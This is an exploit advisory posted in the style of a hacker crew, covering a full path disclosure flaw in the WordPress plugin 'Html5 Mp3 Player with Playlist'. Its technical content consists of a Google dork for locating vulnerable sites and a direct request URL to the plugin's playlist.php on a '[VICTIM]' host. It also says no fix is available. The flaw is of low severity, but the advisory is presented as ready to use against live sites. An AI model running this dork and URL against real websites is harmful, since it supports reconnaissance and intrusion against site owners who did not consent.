WordPress HTML 5 MP3 Player with Playlist Plugin - Full Path Disclosure

2014-11-27 12:05:03

WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[~] HomePage : http://h4x0resec.blogspot.com
[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
|~Vulnerability Style : FULL PATH DISCLOSURE
|[~]Date : "26.11.2014"
|[~]Tested on : Kali Linux, Windows 7
|DORK: inurl:html5plus/html5full.php
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

==============[Exploitation]===============================

http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php

Fixes

No fixes

In order to submit a new fix you need to be registered.